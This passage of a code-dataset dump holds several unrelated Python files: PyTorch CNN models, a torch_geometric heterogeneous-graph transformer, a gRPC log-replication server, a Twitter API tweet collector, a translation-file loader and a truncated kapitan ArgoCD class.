'google-auth>=1.6.1',\n 'google-auth-httplib2>=0.0.3',\n 'google-cloud-core>=0.28.1',\n 'google-cloud-kms>=0.2.1',\n 'google-cloud-storage>=1.13.0',\n 'google-resumable-media>=0.3.1',\n 'googleapis-common-protos>=1.5.5',\n 'httplib2>=0.12.0',\n 'mysql-connector>=2.1.6',\n 'oauth2client>=4.1.3',\n 'PyYAML>=3.13',\n 'six>=1.11.0',\n]\n\nsetup(\n name='cloudsql-replicator',\n version=replicator.__version__,\n install_requires=REQUIRES,\n packages=find_packages(exclude=['tests']),\n namespace_packages=NAMESPACE_PACKAGES,\n license='Apache 2.0',\n entry_points={\n 'console_scripts': [\n 'sr=google.cloud.pontem.sql.replicator.cli.main:run',\n ]\n }\n)\n","sub_path":"CloudSQLReplicator/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"459945585","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Encoder(nn.Module):\n def __init__(self):\n super().__init__()\n\n # Layer 1\n self.conv1 = nn.Conv2d(3, 48, kernel_size=(11, 11), stride=(4, 4), padding=(2, 2))\n self.mp1 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n self.bn1 = nn.BatchNorm2d(48)\n # Layer 2\n self.conv2 = nn.Conv2d(48, 128, kernel_size=(5, 5), stride=(1, 1), padding=(2, 2))\n self.mp2 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n self.bn2 = nn.BatchNorm2d(128)\n # Layer 3\n self.conv3 = nn.Conv2d(128, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n # Layer 4\n self.conv4 = nn.Conv2d(192, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n # Layer 5\n self.conv5 = nn.Conv2d(192, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))\n self.mp3 = nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2))\n\n def forward(self, inputs):\n inputs = F.relu(self.bn1(self.mp1(self.conv1(inputs))))\n inputs = F.relu(self.bn2(self.mp2(self.conv2(inputs))))\n inputs = F.relu(self.conv3(inputs))\n inputs = F.relu(self.conv4(inputs))\n inputs = F.relu(self.mp3(self.conv5(inputs)))\n\n return inputs\n\n\nclass AlexNet(nn.Module):\n def __init__(self, N):\n super().__init__()\n self.N = N\n\n # Encoder\n self.encoder_1 = Encoder()\n self.encoder_2 = Encoder()\n\n # Decoder\n self.fc6_1 = nn.Linear(2*128*6*6, 20)\n self.fc6_2 = nn.Linear(2*128*6*6, 20)\n self.fc7_1 = nn.Linear(40, 20)\n self.fc7_2 = nn.Linear(40, 20)\n self.fc8 = nn.Linear(40, 10)\n\n def forward(self, inputs):\n inputs_1 = self.encoder_1(inputs)\n inputs_2 = self.encoder_2(inputs)\n\n inputs_1 = inputs_1.view(self.N, -1)\n inputs_2 = inputs_2.view(self.N, -1)\n\n temp = torch.cat((inputs_1, inputs_2), dim=1)\n inputs_1 = temp.clone()\n inputs_2 = temp.clone()\n\n inputs_1 = F.relu(self.fc6_1(inputs_1))\n inputs_2 = F.relu(self.fc6_2(inputs_2))\n\n temp = torch.cat((inputs_1, inputs_2), dim=1)\n inputs_1 = temp.clone()\n inputs_2 = temp.clone()\n\n inputs_1 = F.relu(self.fc7_1(inputs_1))\n inputs_2 = F.relu(self.fc7_2(inputs_2))\n\n inputs = torch.cat((inputs_1, inputs_2), dim=1)\n inputs = self.fc8(inputs)\n\n return inputs\n\n\nclass CaffeNet(nn.Module):\n def __init__(self, N):\n super().__init__()\n self.N = N\n\n # Encoder\n self.encoder = Encoder()\n\n # Decoder\n self.fc6 = nn.Linear(128*6*6, 20)\n self.fc7 = nn.Linear(20, 20)\n self.fc8 = nn.Linear(20, 10)\n\n def forward(self, inputs):\n inputs = self.encoder(inputs)\n\n inputs = inputs.view(self.N, -1)\n inputs = F.relu(self.fc6(inputs))\n inputs = F.relu(self.fc7(inputs))\n inputs = self.fc8(inputs)\n\n return inputs\n\n\n# Training\nN = 32\nn_iterations = 100\ninputs = torch.rand(N, 3, 224, 224)\ntargets = torch.randint(10, (N, 1))\ntargets = targets[:, 0]\ntargets = targets.long()\n\nmodel = CaffeNet(N)\nloss_function = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters())\n\n# torch.onnx.export(model, inputs, 'caffenet.onnx', verbose=True) # open in Netron\n\nfor i in range(n_iterations):\n # Forward\n optimizer.zero_grad()\n outputs = model(inputs)\n\n # Loss\n loss = loss_function(outputs, targets)\n\n # Backwards\n loss.backward()\n optimizer.step()\n\n print('iteration:', i, 'loss:', loss.detach().numpy())","sub_path":"example-2.py","file_name":"example-2.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"389614756","text":"# Hexadecimal operations in python with examples\n# import the modules required for the script\nimport base64\n\nExamples = [\"Cat\",\"Mouse\",\"Monitor\"]\n\n\n# display first output line\n# Word\tASCII\tBASE64\nprint(\"Word\\t\",\" ASCII\\t\\t\\t\\t\",\"Base64\")\n# Iterate through the elements in Examples List\nfor ex in Examples:\n\texEnc = \" \"\n\tfor byte in ex.encode():\n\t\texEnc += format(byte,'08b')+\" \"\n\tprint(ex,exEnc,\"\\t\",base64.b64encode(ex.encode()))\n\n","sub_path":"CORE/Cryptography-100/Resources/Hex-AND-OR-XOR-Examples.py","file_name":"Hex-AND-OR-XOR-Examples.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"203182900","text":"# Author: Sebastien Dubois \n#\t\t for ALFA Group, CSAIL, MIT\n\n# The MIT License (MIT)\n# Copyright (c) 2015 Sebastien Dubois\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport matplotlib.pyplot as plt\nfrom iterations_needed import iterationsNeeded\nimport numpy as np\n\nfirst_exp = 4001\nlast_exp = 4050\ntest_name = \"MNIST\"\n\nthreshold = 0.5\nalpha = 0.5\n\n\nmean_iter_needed,q1_iter_needed,median_iter_needed,q3_iter_needed = \\\n\t\t\t\titerationsNeeded(test_name,first_exp,last_exp,threshold,alpha)\n\nabs = 95 + 0.05 * np.asarray(range(101))\n\nfig = plt.figure(figsize=(15,7))\nplt.plot(abs,median_iter_needed,'c')\nplt.plot(abs,q1_iter_needed,'c-.')\nplt.plot(abs[q3_iter_needed < 1000],q3_iter_needed[q3_iter_needed < 1000],'c-.')\nplt.title('Iterations needed')\nplt.xlabel('Percentage of maximum gain')\nplt.ylabel('Number of tested parameters')\nplt.show() ","sub_path":"GCP-HPO/Test/show_iterations_needed.py","file_name":"show_iterations_needed.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"378796342","text":"from typing import Tuple, Dict, Union, Optional, Any\nfrom torch_geometric.typing import NodeType, EdgeType, Metadata\n\nimport re\nimport copy\nimport warnings\nfrom collections import defaultdict, deque\n\nimport torch\nfrom torch.nn import Module\n\nfrom torch_geometric.nn.fx import Transformer\n\ntry:\n from torch.fx import GraphModule, Graph, Node\nexcept ImportError:\n GraphModule = Graph = Node = None\n\n# TODO:\n# * LazyInitialization - Bug: LazyLinear.weight does not support deepcopy yet\n\n\ndef to_hetero(module: Module, metadata: Metadata, aggr: str = \"sum\",\n input_map: Optional[Dict[str, str]] = None,\n debug: bool = False) -> GraphModule:\n r\"\"\"Converts a homogeneous GNN model into its heterogeneous equivalent in\n which node representations are learned for each node type\n :obj:`metadata[0]`, and messages are exchanged between edge type\n :obj:`metadata[1]`, as denoted in the `\"Modeling Relational Data with Graph\n Convolutional Networks\" `_ paper:\n\n .. code-block:: python\n\n import torch\n from torch_geometric.nn import SAGEConv, to_hetero\n\n Net(torch.nn.Module):\n def __init__(self):\n self.lin = Linear(16, 16)\n self.conv = SAGEConv(16, 16)\n\n def forward(self, x, edge_index):\n x = self.lin(x)\n h = self.conv(x, edge_index)\n return torch.cat([x, h], dim=-1)\n\n model = Net()\n\n metadata = (\n ['paper', 'author'],\n [('paper' 'written_by', 'author'), ('author', 'writes', 'paper')],\n )\n\n model = to_hetero(model, metadata)\n model(x_dict, edge_index_dict)\n\n where :obj:`x_dict` and :obj:`edge_index_dict` denote dictionaries that\n hold node features and edge connectivity information for each node type and\n edge type, respectively.\n\n Args:\n module (torch.nn.Module): The homogeneous model to transform.\n metadata (Tuple[List[str], List[Tuple[str, str, str]]]): The metadata\n of the heterogeneous graph, *i.e.* its node and edge types given\n by a list of strings and a list of string triplets, respectively.\n See :meth:`torch_geometric.data.HeteroData.metadata` for more\n information.\n aggr (string, optional): The aggregation scheme to use for grouping\n node embeddings generated by different relations.\n (:obj:`\"sum\"`, :obj:`\"mean\"`, :obj:`\"min\"`, :obj:`\"max\"`,\n :obj:`\"mul\"`). (default: :obj:`\"sum\"`)\n input_map (Dict[str, str], optional): A dictionary holding information\n on the type of input arguments of :obj:`module.forward`.\n In case :obj:`arg` is a node-level argument, then\n :obj:`input_map[key] = 'node'`, and :obj:`input_map[key] = 'edge'`\n otherwise.\n In case :obj:`input_map` is not further specified, will try to\n automatically determine the correct type of input arguments.\n (default: :obj:`None`)\n debug: (bool, optional): If set to :obj:`True`, will perform\n transformation in debug mode. (default: :obj:`False`)\n \"\"\"\n transformer = ToHeteroTransformer(module, metadata, aggr, input_map, debug)\n return transformer.transform()\n\n\nclass ToHeteroTransformer(Transformer):\n\n aggrs = {\n 'sum': torch.add,\n 'mean': torch.add,\n 'max': torch.max,\n 'min': torch.min,\n 'mul': torch.mul,\n }\n\n def __init__(\n self,\n module: Module,\n metadata: Metadata,\n aggr: str = 'sum',\n input_map: Optional[Dict[str, str]] = None,\n debug: bool = False,\n ):\n super().__init__(module, debug)\n self.metadata = metadata\n self.aggr = aggr\n self.input_map = input_map or {}\n assert len(metadata) == 2\n assert len(metadata[0]) > 1 and len(metadata[1]) > 1\n assert aggr in self.aggrs.keys()\n\n def placeholder(self, node: Node, target: Any, name: str):\n # Add a `get` call to the input dictionary for every node-type or\n # edge-type.\n\n input_type = self.input_map.get(name, None)\n if input_type is None and bool(re.search('(edge|adj)', name)):\n input_type = 'edge'\n is_edge_level_placeholder = input_type == 'edge'\n\n if node.type is not None:\n Type = EdgeType if is_edge_level_placeholder else NodeType\n node.type = Dict[Type, node.type]\n\n self.graph.inserting_after(node)\n for key in self.metadata[int(is_edge_level_placeholder)]:\n out = self.graph.create_node('call_method', target='get',\n args=(node, key),\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def get_attr(self, node: Node, target: Any, name: str):\n raise NotImplementedError\n\n def call_message_passing_module(self, node: Node, target: Any, name: str):\n # Add calls to edge type-wise `MessagePassing` modules and aggregate\n # the outputs to node type-wise embeddings afterwards.\n\n # Group edge-wise keys per destination:\n key_name, keys_per_dst = {}, defaultdict(list)\n for key in self.metadata[1]:\n keys_per_dst[key[-1]].append(key)\n key_name[key] = f'{name}__{key[-1]}{len(keys_per_dst[key[-1]])}'\n\n for dst, keys in dict(keys_per_dst).items():\n # In case there is only a single edge-wise connection, there is no\n # need for any destination-wise aggregation, and we can already set\n # the intermediate variable name to the final output name.\n if len(keys) == 1:\n key_name[keys[0]] = f'{name}__{dst}'\n del keys_per_dst[dst]\n\n self.graph.inserting_after(node)\n for key in self.metadata[1]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_module',\n target=f'{target}.{key2str(key)}',\n args=args, kwargs=kwargs,\n name=key_name[key])\n self.graph.inserting_after(out)\n\n # Perform destination-wise aggregation.\n # Here, we aggregate in pairs, popping the first two elements of\n # `keys_per_dst` and append the result to the list.\n for dst, keys in keys_per_dst.items():\n queue = deque([key_name[key] for key in keys])\n i = len(queue) + 1\n while len(queue) >= 2:\n key1, key2 = queue.popleft(), queue.popleft()\n args = (self.find_by_name(key1), self.find_by_name(key2))\n\n new_name = f'{name}__{dst}'\n if self.aggr == 'mean' or len(queue) > 2:\n new_name += f'{i}'\n\n out = self.graph.create_node('call_function',\n target=self.aggrs[self.aggr],\n args=args, name=new_name)\n self.graph.inserting_after(out)\n queue.append(new_name)\n i += 1\n\n if self.aggr == 'mean':\n key = queue.popleft()\n out = self.graph.create_node(\n 'call_function', target=torch.div,\n args=(self.find_by_name(key), len(keys_per_dst[dst])),\n name=f'{name}__{dst}')\n self.graph.inserting_after(out)\n\n def call_module(self, node: Node, target: Any, name: str):\n # Add calls to node type-wise or edge type-wise modules.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_module',\n target=f'{target}.{key2str(key)}',\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def call_method(self, node: Node, target: Any, name: str):\n # Add calls to node type-wise or edge type-wise methods.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_method', target=target,\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def call_function(self, node: Node, target: Any, name: str):\n # Add calls to node type-wise or edge type-wise functions.\n self.graph.inserting_after(node)\n for key in self.metadata[int(self.has_edge_level_arg_kwarg(node))]:\n args, kwargs = self.map_args_kwargs(node, key)\n out = self.graph.create_node('call_function', target=target,\n args=args, kwargs=kwargs,\n name=f'{name}__{key2str(key)}')\n self.graph.inserting_after(out)\n\n def output(self, node: Node, target: Any, name: str):\n # Replace the output by dictionaries, holding either node type-wise or\n # edge type-wise data.\n def _recurse(value: Any) -> Any:\n if isinstance(value, Node):\n return {\n key: self.find_by_name(f'{value.name}__{key2str(key)}')\n for key in self.metadata[int(self.is_edge_level(value))]\n }\n elif isinstance(value, dict):\n return {k: _recurse(v) for k, v in value.items()}\n elif isinstance(value, list):\n return [_recurse(v) for v in value]\n elif isinstance(value, tuple):\n return tuple(_recurse(v) for v in value)\n else:\n return value\n\n if node.type is not None and isinstance(node.args[0], Node):\n output = node.args[0]\n Type = EdgeType if self.is_edge_level(output) else NodeType\n node.type = Dict[Type, node.type]\n else:\n node.type = None\n\n node.args = (_recurse(node.args[0]), )\n\n def init_submodule(self, module: Module, target: str) -> Module:\n # Replicate each module for each node type or edge type.\n has_edge_level_target = bool(\n self.find_by_target(f'{target}.{key2str(self.metadata[1][0])}'))\n\n module_dict = torch.nn.ModuleDict()\n for key in self.metadata[int(has_edge_level_target)]:\n module_dict[key2str(key)] = copy.deepcopy(module)\n if hasattr(module, 'reset_parameters'):\n module_dict[key2str(key)].reset_parameters()\n elif sum([p for p in module.parameters()]) > 0:\n warnings.warn((f\"'{target}' will be duplicated, but its \"\n f\"parameters cannot be reset\"))\n return module_dict\n\n # Helper methods ##########################################################\n\n def map_args_kwargs(self, node: Node,\n key: Union[NodeType, EdgeType]) -> Tuple[Tuple, Dict]:\n def _recurse(value: Any) -> Any:\n if isinstance(value, Node):\n out = self.find_by_name(f'{value.name}__{key2str(key)}')\n if out is None and isinstance(key, tuple):\n out = (self.find_by_name(f'{value.name}__{key[0]}'),\n self.find_by_name(f'{value.name}__{key[-1]}'))\n return out\n elif isinstance(value, dict):\n return {k: _recurse(v) for k, v in value.items()}\n elif isinstance(value, list):\n return [_recurse(v) for v in value]\n elif isinstance(value, tuple):\n return tuple(_recurse(v) for v in value)\n else:\n return value\n\n args = tuple(_recurse(v) for v in node.args)\n kwargs = {k: _recurse(v) for k, v in node.kwargs.items()}\n return args, kwargs\n\n def is_edge_level(self, node: Node) -> bool:\n key = self.metadata[1][0]\n return bool(self.find_by_name(f'{node.name}__{key2str(key)}'))\n\n def has_edge_level_arg_kwarg(self, node: Node) -> bool:\n def _recurse(value: Any) -> bool:\n if isinstance(value, Node):\n return self.is_edge_level(value)\n elif isinstance(value, dict):\n return any([_recurse(v) for v in value.values()])\n elif isinstance(value, (list, tuple)):\n return any([_recurse(v) for v in value])\n else:\n return False\n\n has_edge_level_arg = any([_recurse(value) for value in node.args])\n has_edge_level_kwarg = any([_recurse(v) for v in node.kwargs.values()])\n return has_edge_level_arg or has_edge_level_kwarg\n\n\ndef key2str(key: Union[NodeType, EdgeType]) -> str:\n return '__'.join(key) if isinstance(key, tuple) else key\n","sub_path":"torch_geometric/nn/to_hetero.py","file_name":"to_hetero.py","file_ext":"py","file_size_in_byte":13227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"254738745","text":"import os\r\nimport grpc\r\nimport ReplicatedLog_pb2\r\nimport ReplicatedLog_pb2_grpc\r\nfrom concurrent import futures\r\n\r\nlogs = []\r\nslave_host = os.getenv('SLAVE_HOST', 'localhost')\r\nclass Logger(ReplicatedLog_pb2_grpc.PostRequestServiceServicer):\r\n def PostRequest(self, request, context):\r\n logs.append(request.msg)\r\n with grpc.insecure_channel(f'{slave_host}:50052') as channel:\r\n client = ReplicatedLog_pb2_grpc.PostRequestServiceStub(channel)\r\n slave_request = ReplicatedLog_pb2.POST(msg=request.msg)\r\n if client.PostRequest(slave_request).msg == '1':\r\n return ReplicatedLog_pb2.POSTResponse(msg='Master and Slaves have recived msg')\r\n\r\nclass SendLogs(ReplicatedLog_pb2_grpc.GetRequestServiceServicer):\r\n def GetRequest(self, request, context):\r\n with grpc.insecure_channel(f'{slave_host}:50052') as channel:\r\n client = ReplicatedLog_pb2_grpc.GetRequestServiceStub(channel)\r\n slave_request = ReplicatedLog_pb2.GET(msg='1')\r\n\r\n return ReplicatedLog_pb2.GETResponse(data=client.GetRequest(slave_request).data)\r\n\r\ndef serve():\r\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=2))\r\n ReplicatedLog_pb2_grpc.add_PostRequestServiceServicer_to_server(Logger(), server)\r\n ReplicatedLog_pb2_grpc.add_GetRequestServiceServicer_to_server(SendLogs(), server)\r\n server.add_insecure_port(\"[::]:50051\")\r\n server.start()\r\n server.wait_for_termination()\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n serve()\r\n","sub_path":"Master.py","file_name":"Master.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"77344604","text":"import requests # Para enviar solicitudes GET desde la API\nimport os # Para guardar los tokens de acceso y para la gestión de archivos al crear y añadir al conjunto de datos\nimport pandas as pd # Para mostrar los datos después\n# Para parsear las fechas recibidas de twitter en formatos legibles\nimport dateutil.parser\nimport claves #Importar claves\nimport time\n\nCONSUMER_KEY = claves.CONSUMER_KEY\nCONSUMER_SECRET = claves.CONSUMER_SECRET\nBEARER_TOKEN = claves.BEARER_TOKEN\nACCESS_TOKEN = claves.ACCESS_TOKEN\nACCESS_TOKEN_SECRET = claves.ACCESS_TOKEN_SECRET\n\n# guardaremos el token en una \"variable de entorno\"\nos.environ['TOKEN'] = BEARER_TOKEN\n\n#crearemos nuestra función auth () , que recupera el token del entorno\ndef auth():\n return os.getenv('TOKEN')\n\n#A continuación, definiremos una función que tomará nuestro token de portador, \n#lo pasará para su autorización y devolverá los encabezados que usaremos para acceder a la API.\ndef create_headers(bearer_token):\n headers = {\"Authorization\": \"Bearer {}\".format(bearer_token)}\n return headers\n\n# Ahora que podemos acceder a la API, crearemos la solicitud para el punto final que vamos a usar y los parámetros que queremos pasar.\ndef create_url(keyword, start_date, end_date, max_results=500):\n \n #Cuál es el enlace del endpoint al que queremos acceder para recoger datos\n search_url = \"https://api.twitter.com/2/tweets/search/all\"\n\n \"\"\"Los parámetros que ofrece el endpoint y que podemos usar para personalizar la solicitud que queremos enviar.\"\"\"\n \n query_params = {'query': keyword, \n 'start_time': start_date, #AAAA-MM-DDTHH: mm: ssZ (ISO 8601 / RFC 3339)\n 'end_time': end_date, ##AAAA-MM-DDTHH: mm: ssZ (ISO 8601 / RFC 3339)\n 'max_results': max_results, #El número de resultados de búsqueda devueltos por una solicitud está limitado entre 10 y 500 resultados.\n 'expansions': 'author_id,in_reply_to_user_id,geo.place_id',\n 'tweet.fields': 'id,text,author_id,in_reply_to_user_id,geo,conversation_id,created_at,lang,public_metrics,referenced_tweets,reply_settings,source',\n 'user.fields': 'id,name,username,created_at,description,public_metrics,verified',\n 'place.fields': 'full_name,id,country,country_code,geo,name,place_type',\n 'next_token': {}}\n return (search_url, query_params)\n\n#Ahora que tenemos la URL, los encabezados y los parámetros que queremos, crearemos una función que unirá todo esto y se conectará al punto final.\n#La función a continuación enviará la solicitud \"GET\" y si todo es correcto (código de respuesta 200), devolverá la respuesta en formato \"JSON\".\ndef connect_to_endpoint(url, headers, params, next_token = None): #next_token está configurado en \"Ninguno\" de forma predeterminada, ya que solo nos importa si existe.\n params['next_token'] = next_token #objeto params recibido de la función create_url\n response = requests.request(\"GET\", url, headers = headers, params = params)\n print(\"Endpoint Response Code: \" + str(response.status_code))\n if response.status_code != 200:\n raise Exception(response.status_code, response.text)\n return response.json()\n\ndef create_df(json_response): # Función para crear df de respuesta a partir del json \n res = []\n #Recorrer en bucle cada uno de los tweets del json\n for tweet in json_response['data']:\n \n # creará una variable para cada uno ya que algunas de las claves podrían no existir para algunos tweets\n\n # 1. Author ID\n if ('author_id' in tweet): \n author_id = tweet['author_id']\n else:\n author_id = \" \"\n \n # 2. Time created\n if ('created_at' in tweet): \n created_at = dateutil.parser.parse(tweet['created_at'])\n else:\n created_at = \" \"\n \n # 3. Geolocation\n if ('place_id' in tweet):\n geo = tweet['geo']['place_id']\n else:\n geo = \" \"\n\n # 4. Tweet ID\n if ('id' in tweet):\n tweet_id = tweet['id']\n else: \n id = \" \"\n\n # 5. Language\n if ('lang' in tweet):\n lang = tweet['lang']\n else: \n lang = \" \"\n\n # 6. Tweet metrics\n if ('retweet_count' in tweet):\n retweet_count = tweet['public_metrics']['retweet_count']\n else:\n retweet_count = \" \"\n \n if ('reply_count' in tweet):\n reply_count = tweet['public_metrics']['reply_count']\n else:\n reply_count = \" \"\n \n if ('like_count' in tweet):\n like_count = tweet['public_metrics']['like_count']\n else:\n like_count = \" \"\n \n if ('quote_count' in tweet):\n quote_count = tweet['public_metrics']['quote_count']\n else:\n quote_count = \" \"\n \n # 7. source\n if ('source' in tweet):\n source = tweet['source']\n else:\n source = \" \"\n \n # 8. Tweet text\n if ('text' in tweet): \n text = tweet['text']\n else:\n text = \" \"\n \n # Reunir todos los datos en una lista\n res.append([author_id, created_at, geo, tweet_id, lang, like_count, quote_count, reply_count, retweet_count, source, text])\n \n df_res = pd.DataFrame(data = res, columns=['author id', 'created_at', 'geo', 'id','lang', 'like_count', 'quote_count', 'reply_count','retweet_count','source','tweet'])\n # Imprime el número de tweets de esta iteración\n return df_res\n\ndef create_df_final(url, headers, json_response): #función para obtener todos los tweets de cada consulta\n df_res = create_df(json_response) #paso como parámetro\n print(\"Número de Tweets añadidos de esta respuesta: \",len(df_res))\n while 'next_token' in json_response[\"meta\"]:\n # Guarda el token para usarlo en la siguiente llamada\n next_token = json_response['meta']['next_token']\n if ('data' in json_response) and len(df_res)< 499500:\n json_response = connect_to_endpoint(url[0], headers, url[1], next_token)\n df_aux = create_df(json_response)\n df_res = pd.concat([df_res,df_aux])\n time.sleep(2) #Se agrega un time.sleep () entre llamadas para asegurarse de que no solo está enviando spam a la API con solicitudes.\n print(\"Número de Tweets añadidos de esta respuesta: \",len(df_res))\n else:\n break\n return df_res \n","sub_path":"twitter_api.py","file_name":"twitter_api.py","file_ext":"py","file_size_in_byte":6548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"29870122","text":"# -*- coding: utf-8 -*-\n\"\"\"\n severus.language\n ----------------\n\n Provides language data wrapper.\n\n :copyright: 2020 Giovanni Barillari\n :license: BSD-3-Clause\n\"\"\"\n\nfrom __future__ import annotations\n\nimport json\nimport re\n\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Tuple, Union\nfrom yaml import SafeLoader as ymlLoader, load as ymlload\n\nfrom .datastructures import GroupData\n\n\nclass Language:\n __slots__ = ['_sources', '_strings', '_groups', '_encoding', 'get']\n _re_nkey = re.compile(r'n\\d+')\n\n def __init__(\n self,\n data_path: Path,\n encoding: str = 'utf8',\n filename_prefix: bool = True,\n watch_changes: bool = False\n ):\n self._sources: List[Dict[str, Any]] = []\n self._strings: Dict[str, str] = {}\n self._groups: Dict[Union[int, str], str] = {}\n self._encoding: str = encoding\n self.get = self._get_reload if watch_changes else self._get_static\n self._load_sources(data_path, filename_prefix)\n\n def _build_key(self, key: str, prefix: Optional[str] = None):\n return f'{prefix}.{key}' if prefix else key\n\n def _load_sources(\n self,\n path: Path,\n filename_prefix: bool = True\n ):\n sources, filename_prefix_applicable = [], False\n if path.is_dir():\n filename_prefix_applicable = filename_prefix\n for file_path in path.iterdir():\n if file_path.suffix in [\n '.json', '.yml', '.yaml'\n ]:\n sources.append(file_path)\n elif path.is_file():\n sources.append(path)\n for source in sources:\n self._sources.append({\n 'path': source,\n 'mtime': source.stat().st_mtime,\n 'prefix': filename_prefix_applicable\n })\n self._load_source(source, filename_prefix_applicable)\n\n def _load_source(\n self,\n path: Path,\n filename_prefix: bool = False\n ):\n ext = path.suffix\n if ext == '.json':\n with path.open(\"rt\", encoding=self._encoding) as f:\n data = json.loads(f.read())\n elif ext in ['.yml', '.yaml']:\n with path.open(\"rt\", encoding=self._encoding) as f:\n data = ymlload(f.read(), Loader=ymlLoader)\n else:\n raise RuntimeError(f'Invalid source format: {path}')\n prefix = filename_prefix and path.stem or None\n self._load_data(data, prefix)\n\n def _load_data(\n self,\n data: Dict[str, Union[Dict, str]],\n prefix: Optional[str] = None\n ):\n for key, val in data.items():\n if isinstance(val, str):\n self._strings[self._build_key(key, prefix)] = val\n continue\n keyset = set(val.keys()) - {'_'}\n if len(self._re_nkey.findall(','.join(keyset))) == len(keyset):\n self._groups[self._build_key(key, prefix)] = GroupData(val)\n else:\n self._load_data(val, self._build_key(key, prefix))\n\n def _ensure_updated_sources(self):\n for source in self._sources:\n mtime = source['path'].stat().st_mtime\n if mtime != source['mtime']:\n source['mtime'] = mtime\n self._load_source(source['path'], source['prefix'])\n\n def _get_reload(self, text: str) -> Tuple[str, Dict[int, str]]:\n self._ensure_updated_sources()\n return self._strings.get(text, text), self._groups.get(text, {})\n\n def _get_static(self, text: str) -> Tuple[str, Dict[int, str]]:\n return self._strings.get(text, text), self._groups.get(text, {})\n","sub_path":"severus/language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"283628913","text":"import base64\nimport hashlib\nimport os\n\nfrom kapitan.cached import args\nfrom kapitan.inputs.kadet import BaseObj, inventory\nfrom kapitan.utils import render_jinja2_file\n\nsearch_paths = args.get(\"search_paths\")\n\nfrom . import k8s\n\n\ndef j2(filename, ctx):\n return render_jinja2_file(filename, ctx, search_paths=search_paths)\n\n\ninv = inventory(lazy=True)\n\n\ndef merge(source, destination):\n for key, value in source.items():\n if isinstance(value, dict):\n node = destination.setdefault(key, value)\n if node is None:\n destination[key] = value\n else:\n merge(value, node)\n else:\n destination[key] = destination.setdefault(key, value)\n\n return destination\n\n\nclass ArgoCDAppProject(k8s.Base):\n def new(self):\n self.need(\"name\")\n self.kwargs.apiVersion = \"argoproj.io/v1alpha1\"\n self.kwargs.kind = \"AppProject\"\n\n # Add a this finalizer ONLY if you want these to cascade delete\n self.kwargs.finalizers = list(\"resources-finalizer.argocd.argoproj.io\")\n super().new()\n\n def body(self):\n super().body()\n\n # You'll usually want to add your resources to the argocd namespace.\n self.add_namespace(inv.parameters.argocd_namespace)\n\n argocd_project = self.kwargs.argocd_project\n\n self.add_annotations(argocd_project.get(\"annotations\", {}))\n self.add_labels(argocd_project.get(\"labels\", {}))\n\n # Allow manifests to deploy from any Git repos\n if argocd_project.source_repos:\n self.root.spec.sourceRepos = argocd_project.source_repos\n\n # Only permit applications to deploy to the namespace in the same cluster\n if argocd_project.destinations:\n self.root.spec.destinations = argocd_project.destinations\n\n # Deny all cluster-scoped resources from being created, except for Namespace\n if argocd_project.cluster_resource_whitelist:\n self.root.spec.clusterResourceWhitelist = (\n argocd_project.cluster_resource_whitelist\n )\n\n # Allow all namespaced-scoped resources to be created, except for ResourceQuota, LimitRange, NetworkPolicy\n if argocd_project.namespace_resource_blacklist:\n 